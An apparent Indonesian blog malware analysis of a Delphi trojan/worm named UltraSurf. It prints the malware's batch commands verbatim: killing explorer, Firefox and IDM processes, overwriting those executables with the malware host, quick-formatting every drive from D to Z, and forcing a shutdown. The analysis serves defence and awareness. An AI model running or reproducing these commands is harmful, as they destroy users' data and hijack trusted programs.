A. Info File
Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 – 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm
Variant pertama dari UltraSurf kami dapatkan berasal dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.
Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.
C. Companion/File yang dibuat
Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.
D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe
taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe
mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Internet Download Manager\IDMan.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Mozilla Firefox\firefox.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer.exe"
Memformat semua hard disk mulai dari drive D sampai Z.
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y
Dan yang terakhir adalah melakukan proses shuting down
start shutdown.exe -f -t 0 –s
Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.
Comments
Post a Comment